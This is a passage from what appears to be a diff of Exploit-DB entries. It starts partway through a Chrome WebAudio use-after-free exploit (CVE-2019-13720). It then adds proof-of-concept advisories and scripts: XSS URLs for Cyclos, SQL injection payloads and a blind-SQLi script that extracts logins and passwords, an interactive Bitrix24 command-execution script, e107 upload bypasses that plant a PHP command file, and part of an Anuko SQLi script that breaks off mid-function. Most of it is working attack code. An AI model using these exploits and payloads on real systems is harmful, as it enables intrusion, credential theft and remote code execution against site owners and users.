DebugLog("... Super page: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span.
HelperBigInt[0] = FeedforwardSuperPageBase;
DebugLog("... first Super Page in extent: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase);
FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit.
IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data.
HelperBigInt[0] = IIRFilterFeedforwardAllocPtr;
DebugLog("... IIRFilterFeedforwardAllocPtr: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom);
}
async function InfoleakUAF(CallbackFunc) {
let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. Wheen rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processsed data after it travels through the ConvolverNode and ScriptNode.
let AudioBufferSourceNode = TempAudioCtx.createBufferSource();
let ConvolverNode = TempAudioCtx.createConvolver();
let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel.
let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000);
let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000);
let Finished = false;
let RenderCount = 0;
ConvolverNode.buffer = ChannelBuf;
AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full
AudioBufferSourceNode.loop = true;
AudioBufferSourceNode.loopStart = 0;
AudioBufferSourceNode.loopEnd = 1;
ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread
AudioBufferSourceNode.connect(ConvolverNode);
ConvolverNode.connect(ScriptNode);
ScriptNode.connect(TempAudioCtx.destination);
AudioBufferSourceNode.start();
ScriptNode.onaudioprocess = function(Evt) {
RenderCount++;
for (let i = 0; i < 1; i++) {
let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer);
for (let j = 0; j < ChannelInputBuf.length; j++) {
/*
Notably, it is not only the first frame of the input buffer which is checked for the leaked flink.
There are 16384 frames (each the size of a Float32) copied into the input channel buffer each
time this handler receives an event. Typically only 0-1 of these frames will contain a leaked
flink freelist pointer.
*/
if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) {
let TempHelperBigInt = new BigUint64Array(1);
let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer);
TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer
TempHelperDword[1] = ChannelInputBuf[j + 1];
let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]);
// Check QWORD from SharedAudioBuffer for a non-zero value
if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) {
LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region?
}
if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) {
// Valid leak: end the recursion cycle for this UAF and execute a callback
Finished = true;
Evt = null;
AudioBufferSourceNode.disconnect();
ScriptNode.disconnect();
ConvolverNode.disconnect();
setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1);
return;
}
}
}
}
};
TempAudioCtx.startRendering().then(function(Buf) {
Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle
if (!Finished) {
Finished = true;
InfoleakUAF(CallbackFunc);
}
});
/*
Attack the race condition which allows for a free list flink to be copied
into the ScriptNode input channel buffer: the renderer thread is receiving
data into the SharedBuffer in the Convolver, processing it, then copying
it into the ScriptNode input channel until it is full (then the ScriptNode
receives an event). The SharedBuffer must be freed precisely between the
time when new data is received from the BufferSource, and the processed data
is copied into the ScriptNode. Simply freeing the buffer will not work,
since the next chunk of data from the BufferSource will not be placed into
SharedBuffer if it is NULL. However, there is no check if SharedBuffer is
NULL when the processed data it contains is copied into the ScriptNode input.
*/
while (!Finished) {
ConvolverNode.buffer = null;
ConvolverNode.buffer = ChannelBuf;
await Sleep(1); // 1ms
}
}
function FeedforwardHeapGroom() {
let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000);
let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data.
let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data.
// Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory.
FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f
FeedforwardArray[0] = 0; // Changing these feedforward values has no affect on memory at leaked ptr
FeedforwardArray[1] = -1;
for (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filtrs are creatd directly after page initialization.
IIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray));
}
// Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 during init which causess an 0x240 slot span to be created in the first Super Page.
let Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 61 and lower will consistently crash.
for(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span.
TempConvolver = TempAudioCtx.createConvolver();
AudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000);
TempConvolver.buffer = AudioBuf;
GcPreventer.push(AudioBuf);
GcPreventer.push(TempConvolver);
}
// Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen.
let Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance.
for(var x = 0; x < (Bucket200Slots / 2); x++) {
TempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size)
GcPreventer.push(TempConvolver);
}
}
try {
var BrowserVersion = navigator.userAgent.split("Chrome/")[1].split(" Safari/")[0];
MajorVersion = parseInt(BrowserVersion.substr(0, 2));
if (MajorVersion <= 78) {
ValidBrowser = true;
if(MajorVersion != 76) {
alert("This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version");
}
}
else {
alert("CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser");
}
}
catch (e) {
DebugLog("... failed to parse browser version from user agent.");
}
if(ValidBrowser) {
FeedforwardHeapGroom();
InfoleakUAF(InfoleakUAFCallback);
}
else {
DebugLog("... unsupported browser version " + navigator.userAgent);
}
</script>
</html>

17
exploits/multiple/webapps/50908.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Date: 18/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674
# Description:
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.
# Steps to reproduce:
An attacker sends a draft URL
[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.
When a victim opens the URL, XSS will be triggered.

17
exploits/multiple/webapps/50909.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Date: 17/04/2021
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673
# Description:
A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.
# Steps to reproduce:
An attacker sends a draft URL
[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.
When a victim opens the URL, XSS will be triggered.

14
exploits/php/webapps/50890.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: ImpressCMS v1.4.4 - Unrestricted File Upload
# Date: 7/4/2022
# Exploit Author: Ünsal Furkan Harani (Zemarkhos)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://github.com/ImpressCMS/impresscms
# Version: v1.4.4
# Description:
Between lines 152 and 162, we see the function "extensionsToBeSanitized".Since the blacklist method is weak, it is familiar that the file can be uploaded in the extensions mentioned below.
.php2, .php6, .php7, .phps, .pht, .pgif, .shtml, .htaccess, .phar, .inc
Impresscms/core/File/MediaUploader.php Between lines 152 and 162:
private $extensionsToBeSanitized = array('php','phtml','phtm','php3','php4','cgi','pl','asp','php5');

51
exploits/php/webapps/50891.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Microfinance Management System 1.0 - 'customer_number' SQLi
# Date: 2022-25-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-27927
# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
------------------------------------------------------------------------------------
1. Description:
----------------------
Microfinance Management System allows SQL Injection via parameter 'customer_number' in
/mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'customer_number' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap.py -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(error-based)
customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
4. Burpsuite request:
----------------------
GET /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27 HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=rf50l831r3vn4ho0g6aef189bt
Referer: http://localhost/mims/managecustomer.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

44
exploits/php/webapps/50893.py Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
# Date: 04/20/2022
# Exploit Author: Behrad Taher
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Version: < 2.4p3
# CVE : CVE-2021-43481
#The script takes 3 arguments: IP, user ID, session ID
#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i
import requests, time, sys
from bs4 import BeautifulSoup
ip = sys.argv[1]
id = sys.argv[2]
sid = sys.argv[3]
def sqli(column):
print("Extracting %s from user with ID: %s\n" % (column,id))
extract = ""
for i in range (1,33):
#This conditional statement will account for variable length usernames
if(len(extract) < i-1):
break
for j in range(32,127):
injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
GET_cookies = {"webTareasSID": "%s" % sid}
r = requests.get(url, cookies=GET_cookies)
#Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"
token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
#Because this is an authenticated vulnerability we need to provide a valid session token
POST_cookies = {"webTareasSID": "%s" % sid}
POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
start = time.time()
requests.post(url, cookies=POST_cookies, data=POST_data)
end = time.time() - start
if end > 5:
extract += chr(j)
print ("\033[A\033[A")
print(extract)
break
#Modularized the script for login and password values
sqli("login")
sqli("password")

27
exploits/php/webapps/50895.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
# Google Dork: -
# Date: 2022-03-13
# Exploit Author: Roel van Beurden
# Vendor Homepage: -
# Software Link: https://downloads.wordpress.org/plugin/advanced-uploader.4.2.zip
# Version: <=4.2
# Tested on: WordPress 5.9 on Ubuntu 18.04
# CVE: CVE-2022-1103
1. Description:
----------------------
WordPress Plugin Advanced Uploader <=4.2 allows authenticated arbitrary file upload. Any file(type) can be uploaded. A malicious user can perform remote code execution on the backend webserver.
2. Proof of Concept:
----------------------
- Upload file/webshell/backdoor with the Advanced Uploader plugin;
- File is uploaded in the Wordpress Media Library;
- Go to /wp-content/uploads/ where the file is saved;
- Click on the uploaded file for whatever it's supposed to do (RCE, reverse shell).
3. Exploitation demo:
----------------------
https://www.youtube.com/watch?v=Bwpf-IpxtXQ

16
exploits/php/webapps/50896.txt Normal file
View file

@ -0,0 +1,16 @@
Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi
# Date: 2021-4-21
# Exploit Author: Aydin Naserifard
# Vendor Homepage: https://www.adobe.com/
# Software Link: https://github.com/magento/magento2/releases/tag/2.3.5-p2
# Version: [2.3.5-p2]
# Tested on: [2.3.5-p2]
POC:
1)PUT
/rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23
2)POST /cargo/index/validateqty
[quote_id parameter]
quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23

54
exploits/php/webapps/50898.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os
#/usr/bin/env python
#Created by heinjame
import requests
import re
from bs4 import BeautifulSoup
import argparse,sys
user_agent = {'User-agent': 'HeinJame'}
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Betrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
inputcmd = input(">>")
s = requests.Session()
def login():
postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}
r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)
def getsessionid():
sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",
headers = user_agent)
session = re.search(r"'bitrix_sessid':.*", sessionid.text)
extract = session.group(0).split(":")
realdata = extract[1].strip(" ")
realdata = realdata.replace("'","")
realdata = realdata.replace(",","")
return realdata
# print(r.text)
def cmdline(cmd,sessionid):
cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}
usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers
= user_agent, data = cmdline)
soup = BeautifulSoup(usercmd.content,'html.parser')
cmd = soup.find('p').getText()
print(cmd.rstrip())
login()
sessionid = getsessionid()
while inputcmd != "exit":
cmdline(inputcmd,sessionid)
inputcmd = input(">>")

30
exploits/php/webapps/50899.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4
# Discovery of Vulnerability
- First go to CSZ CMS web page
- then go to http://yourhost/plugin/article directory on CMS.
- To see the error-based SQLi vulnerability, the ' character is entered in the search section.
- It is determined that the "p" parameter creates the vulnerability.
- Databases can be accessed with manual or automated tools.
# Proof of Concept
http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
# Sqlmap output:
Parameter: p (GET)
Type: error-based
Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO
Type: time-based blind
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS

221
exploits/php/webapps/50910.txt Normal file
View file

@ -0,0 +1,221 @@
# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Reflected - Via adding comment (Authenticated)
# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' >
[...]
User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field
image.png
### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.
Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)
image->media manager->upload a file->Image/File URL
admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]
image.png
### Upload restriction bypass (Authenticated [Admin])+RCE
Upload and execute .PHP file
Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.
image.png
Media Manager-> Media Upload/Import -> From a remote location
# POC
Request
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
We can see uploaded PHP file on the server side.
image.png
cmd.php file source:
<?php
system('whoami');
?>
image.png
### Upload restriction bypass (Authenticated [Admin])+ Server file override
Attacker can override example top.php file in the main directory of web application.
Original file top.php in server:
image.png
We can override file via following upload functionality:
Media Manager-> Media Upload/Import -> From a remote location
# POC
Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php
Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
top.php file content was tampered:

181
exploits/php/webapps/50915.py Executable file
View file

@ -0,0 +1,181 @@
# Exploit Title: Anuko Time Tracker - SQLi (Authenticated)
# Date: 2022-05-03
# Exploit Author: Altelus
# Vendor Homepage: https://www.anuko.com/
# Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d
# Version: Anuko Time Tracker 1.20.0.5640
# Tested on: Linux
# CVE : CVE-2022-24707
# An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled.
# User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed.
# The 'date' parameter is then injected with SQL payload for leaking database contents.
from time import time
import requests
import argparse
import re
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
def get_puncher_page():
punch_txt = r_client.get(host + "/puncher.php").text
if "Feature is disabled" in punch_txt:
print("[-] Puncher feature is disabled.")
exit(0)
print("[+] Puncher feature is enabled. Picking a project...")
soup = BeautifulSoup(punch_txt, features="lxml")
time_record_form = soup.find("select", {"name" : "project", "id" : "project"})
project_list = time_record_form.findAll("option")
if len(project_list) <= 1:
print("[-] No project to choose from")
exit(0)
f_proj = project_list[1]
print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text))
return f_proj['value']
def login(username, password):
global r_client
data = {
"login" : username,
"password" : password,
"btn_login" : "Login",
}
login_txt = r_client.post(host + "/login.php", data=data).text
if "Incorrect" in login_txt:
print("[-] Failed to login. Credentials are not correct.")
exit(0)
print("[+] Login successful!")
def start_puncher(project_id):
global r_client
data = {
"project": project_id,
"btn_start": "Start",
"browser_today" : "",
"browser_time" : "04:00",
"date": "{}-{}-{}".format(date.year, date.month, date.day)
}
headers = {
"Referer" : host + "/puncher.php"
}
